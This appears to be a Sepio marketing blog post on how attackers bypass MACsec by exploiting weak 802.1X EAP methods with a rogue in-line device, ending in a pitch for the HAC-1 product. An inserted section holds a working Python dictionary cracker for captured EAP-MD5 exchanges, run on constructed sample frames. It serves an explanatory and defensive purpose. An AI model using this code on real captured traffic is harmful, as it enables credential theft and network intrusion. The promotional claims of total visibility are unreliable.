Macsec Is Your Silver Bullet? Think Again

MACsec

Are you sure you’re safe?

Any form of cybersecurity is better than none at all. And the more cybersecurity measures in place, the better (be that software solutions, protocols, or practices). However, it is imperative to actually know the functions of such measures and how they protect you – or don’t. One of the greatest challenges we see in the cybersecurity world is knowing where the blind spots are. Often, cybersecurity efforts get implemented under the perception that they solve problems A, B, and C, when, in actuality, they only solve problems A and B. MACsec is one such example. While an undeniably valuable protocol, misconceptions surround the extent of protection that MACsec offers. As a result, organizations still face problem C, they just don’t know it – and that’s more dangerous than being knowingly exposed to it.

What is MACsec?

MACsec (IEEE 802.1AE) is a network security standard, widely deployed in PHYs, switches, firewalls, gateways and NICs, that provides Layer 2 security. It protects both network-to-network and device-to-network connections. MACsec provides point-to-point, hop-by-hop security by encrypting and integrity-protecting Ethernet frames between directly connected devices on a physical or virtual local area network (LAN); because each hop decrypts the frames it forwards, network administrators can still inspect data in transit at the switch. In doing so, MACsec ensures the confidentiality, integrity, and authenticity of user data on the link. Admission of devices to the LAN is not handled by MACsec itself but by its companion standard, IEEE 802.1X: the supplicant (the device) authenticates to the switch (the authenticator) through an Extensible Authentication Protocol (EAP) method, and the MACsec Key Agreement (MKA) protocol then derives the link keys from that exchange (or from a pre-shared key). Once keys are in place every frame carries an integrity check value, so the switch accepts a frame only if it comes from the peer that holds the key; that is how MACsec mitigates attacks on Layer 2 protocols and keeps unauthorized LAN connections off the network.

It sounds like MACsec is the solution to many of your network security woes. In addition to ensuring data protection, MACsec essentially acts as a bodyguard for your network, vetting connections to prevent any unwanted guests from getting inside. But, just as one might use a fake ID to bypass a bodyguard, attackers do the same to work around the MACsec protocol.

Meet: problem C

MACsec relies on authenticating supplicants through EAP methods. Yet several EAP methods are weak (EAP-MD5, or PEAP/MSCHAPv2 deployed without server-certificate validation, for example), allowing attackers to exploit the authentication process through a gateway attack and, subsequently, gain unauthorized network access. In a gateway attack, the perpetrator deploys a rogue device that initially acts as a passive tap. Passive taps have neither a MAC nor an IP address, allowing them to operate covertly (as the name suggests), simply sniffing network traffic. This, in itself, is a major cybersecurity threat, but attackers don’t always stop there. They want more; they want network access.

A simple switchboard application enables the passive tap to carry out more complex man-in-the-middle (MITM) attacks. Instead of clandestine traffic sniffing, network traffic is rerouted directly to the rogue device. The supplicant, unknowingly, is forced to authenticate with the rogue device rather than directly with the switch (the authenticator). The EAPOL frames that carry this exchange travel in the clear, because no MACsec keys exist yet, so the rogue device captures the EAP challenge and response. With a password-based method the malicious actor can crack that challenge/response offline and use the stolen credentials to authenticate with the network directly. When connected to the switch, the rogue device spoofs the supplicant’s IP address, MAC address and cracked EAP credentials. Naturally, the connection is authenticated, and the attacker has direct access to the network. One caveat: with a certificate-based method such as EAP-TLS there is no password-derived material to crack, so this step of the attack depends on the deployment using one of the weak EAP methods above.
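The credential-cracking step described above, shown as an added example that is not part of the original post or of any Sepio product: a rogue device in the MITM position captures the EAP-MD5 Request/Challenge and the supplicant’s Response, then runs a dictionary attack, because the EAP-MD5 response is simply MD5(Identifier || password || challenge) (RFC 3748 and RFC 1994). The sample frames, the password “Summer2021!”, the identity “alice” and the wordlist are all constructed for the example. The same function also shows the caveat: when the captured exchange is EAP-TLS (type 13) it reports that there is nothing to crack.

```python
import hashlib
import struct

# EAP constants (RFC 3748)
EAP_REQUEST, EAP_RESPONSE = 1, 2
EAP_TYPE_MD5, EAP_TYPE_TLS = 4, 13


def parse_eap(pkt: bytes) -> dict:
    """Parse one EAP packet: Code(1) Identifier(1) Length(2) Type(1) Type-Data."""
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    if length != len(pkt) or length < 5:
        raise ValueError("bad EAP length")
    eap_type = pkt[4]
    data = pkt[5:length]
    out = {"code": code, "id": ident, "type": eap_type}
    if eap_type == EAP_TYPE_MD5:
        # MD5-Challenge Type-Data: Value-Size(1) Value(n) Name(rest)
        size = data[0]
        out["value"] = data[1:1 + size]
        out["name"] = data[1 + size:]
    return out


def md5_challenge_response(ident: int, password: bytes, challenge: bytes) -> bytes:
    """CHAP/EAP-MD5 response value: MD5(Identifier || secret || Challenge)."""
    return hashlib.md5(bytes([ident]) + password + challenge).digest()


def build_eap_md5(code: int, ident: int, value: bytes, name: bytes = b"") -> bytes:
    """Serialise an EAP-MD5 Request or Response packet."""
    data = bytes([len(value)]) + value + name
    return struct.pack("!BBH", code, ident, 5 + len(data)) + bytes([EAP_TYPE_MD5]) + data


def crack_eap_md5(request: bytes, response: bytes, wordlist):
    """Recover the password from a captured EAP-MD5 exchange, or None if it is
    not crackable (wrong method, or no wordlist hit)."""
    req, resp = parse_eap(request), parse_eap(response)
    if req["type"] == EAP_TYPE_TLS or resp["type"] == EAP_TYPE_TLS:
        return None  # certificate-based: nothing password-derived to crack
    if req["type"] != EAP_TYPE_MD5 or resp["type"] != EAP_TYPE_MD5:
        raise ValueError("not an EAP-MD5 exchange")
    if req["id"] != resp["id"]:
        raise ValueError("identifier mismatch: response does not answer this request")
    for candidate in wordlist:
        if md5_challenge_response(resp["id"], candidate, req["value"]) == resp["value"]:
            return candidate.decode()
    return None


# --- constructed sample capture (hypothetical values, not real traffic) ---
CHALLENGE = bytes.fromhex("00112233445566778899aabbccddeeff")
SECRET = b"Summer2021!"          # the supplicant's (weak) password
EAP_ID = 7
SAMPLE_REQUEST = build_eap_md5(EAP_REQUEST, EAP_ID, CHALLENGE)
SAMPLE_RESPONSE = build_eap_md5(
    EAP_RESPONSE, EAP_ID, md5_challenge_response(EAP_ID, SECRET, CHALLENGE), b"alice")
WORDLIST = [b"password", b"Winter2020", b"Summer2021!"]

# A minimal EAP-TLS start exchange (type 13, flags byte only) for the caveat.
TLS_REQUEST = struct.pack("!BBH", EAP_REQUEST, 8, 6) + bytes([EAP_TYPE_TLS, 0x20])
TLS_RESPONSE = struct.pack("!BBH", EAP_RESPONSE, 8, 6) + bytes([EAP_TYPE_TLS, 0x00])


def demo():
    """Returns (cracked password from the EAP-MD5 capture, result for EAP-TLS)."""
    return crack_eap_md5(SAMPLE_REQUEST, SAMPLE_RESPONSE, WORDLIST), \
        crack_eap_md5(TLS_REQUEST, TLS_RESPONSE, WORDLIST)


if __name__ == "__main__":
    print(demo())  # ('Summer2021!', None)
```

The point for a defender is that everything the attacker needs (identifier, challenge, response) is visible to a Layer 1 tap before any MACsec key exists; choosing a method that sends no password-derived value, and validating the authenticator’s certificate so the rogue device cannot pose as the switch, removes this step regardless of how the tap got onto the link.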

Problem “See”

The underlying issue here is a gap in visibility. Organizations deem MACsec a foolproof network security protocol because it protects against unauthorized network devices. But this fails to take into consideration the devices that evade detection. MACsec operates on Layer 2, leaving Layer 1 exposed, a blind spot the rogue device exploits by operating on that layer. Without Layer 1 data, MACsec cannot detect the rogue device, and, as a result, the switch thinks it is connecting to a legitimate, authorized supplicant.

Solving problem C – really!

Sepio has developed the HAC-1 solution to close the gap in device visibility. As the leader in Rogue Device Mitigation (RDM), Sepio’s solution, through Physical Layer (Layer 1) fingerprinting, identifies, detects, and handles all peripherals; no device goes unmanaged. In addition to gathering Layer 1 data, a comprehensive policy enforcement mechanism recommends best-practice policy and allows the administrator to define a strict, or more granular, set of rules for the system to enforce. More importantly, the solution detects and blocks attacks occurring through the Ethernet interface (passive taps, spoofing devices, unmanaged switches) and the USB interface (HID emulators, NIC manipulators). In doing so, HAC-1 goes deeper and lower than any other solution has gone before to provide Zero Trust Hardware Access, filling the gap where MACsec fails.

The Sepio platform uses a novel algorithm that combines a physical layer fingerprinting module with a Machine Learning module, providing the sought-after level of visibility and enforcement. It is further augmented by a threat intelligence database, ensuring a lower-risk hardware infrastructure.

Hardware Asset Control solution for IoT security

Sepio Hardware Access Control HAC-1, provides 100% hardware device visibility.

HAC-1 enables Hardware Access Control by setting rules based on the devices’ characteristics.

HAC-1 instantly detects any device that breaches the set rules and automatically blocks it to prevent malicious attacks.

The idea is to Verify and then Trust that those assets are what they say they are.

With greater visibility, the zero-trust architecture can grant access decisions with complete information.

Thus, enhancing the enterprise’s protection within, and outside of, its traditional perimeters.

The Hardware Access Control capabilities of HAC-1 block Rogue Devices as soon as they are detected.

Our HAC-1 solution stops an attack at the first instance, not even allowing such devices to make network access requests.


Physical Layer Fingerprinting

Sepio is the only company in the world to undertake Physical Layer fingerprinting. HAC-1 detects and handles all peripherals; no device goes unmanaged.

With this total visibility, a stronger cyber security posture is achieved. There is no longer a need to rely on manual reporting or employee compliance. Sepio manages security and provides answers to questions such as:

  • Do we have an implant or spoofed device in our network?
  • How many IoT devices do we have?
  • Who are the top 5 vendors for devices found in our network?
  • Where are the most vulnerable switches in our network?

Having visibility across all hardware assets provides a more comprehensive cyber security defense.

This reduces the risk of a hardware attack succeeding and of private health data being stolen.

Founded in 2016 by cybersecurity industry veterans from the Israeli Intelligence community, Sepio’s HAC-1 is the first hardware access control platform that provides visibility, control, and mitigation to zero trust, insider threat, BYOD, IT, OT and IoT security programs.

Sepio’s Technology

Sepio’s hardware fingerprinting technology discovers all managed, unmanaged and hidden devices that are otherwise invisible to all other security tools.

Sepio is a strategic partner of Munich Re, the world’s largest re-insurance company, and Merlin Cyber, a leading cybersecurity federal solution provider.

Heavy spending on cybersecurity should bring a high return on investment, yet gaps in visibility limit this.

HAC-1 fingerprinting technology

The Sepio Hardware Access Control (HAC-1) solution closes the gaps in device visibility to ensure you are getting the most out of your cybersecurity investments.

HAC-1 integrates with existing solutions, such as NAC, EPS, SIEM and SOAR, to enhance the organization’s cybersecurity posture.

HAC-1’s deep visibility capabilities mean no device goes unmanaged; the solution identifies, detects, and handles all IT/OT/IoT devices.

Moreover, HAC-1’s policy enforcement mechanism and Rogue Device Mitigation capabilities instantly block any unapproved or rogue hardware.

In doing so, ultimately, HAC-1 enables a Zero Trust Hardware Access approach which stops attackers at the first line of defense.

Sepio supporting compliance

Sepio Systems’ Hardware Access Control (HAC-1) solution provides entities with the Physical Layer coverage they need to obtain complete device visibility. And, in doing so, also provides protection against hardware-based attacks.

As the leader in Rogue Device Mitigation (RDM), Sepio’s solution identifies, detects and handles all peripherals; no device goes unmanaged.

HAC-1 fingerprinting technology

HAC-1 uses Physical Layer fingerprinting technology and Machine Learning to calculate a digital fingerprint from the electrical characteristics of every device and compares it against known fingerprints.

In doing so, HAC-1 is able to provide organizations with ultimate device visibility and detect vulnerable devices and switches within the infrastructure.

In addition to the deep visibility layer, a comprehensive policy enforcement mechanism recommends best-practice policy and allows the administrator to define a strict, or more granular, set of rules for the system to enforce.

When a device breaches the pre-set policy, HAC-1 automatically instigates a mitigation process that instantly blocks unapproved or Rogue hardware.

Furthermore, HAC-1’s RDM capabilities support compliance with Section 8 of the EO, which concerns the government’s investigative and remediation capabilities.

Section 8 focuses on enhancing data collection efforts in order to improve the investigation and remediation processes following an incident. HAC-1 logs all hardware asset information and usage and maintains such data for a period defined by the system administrator.
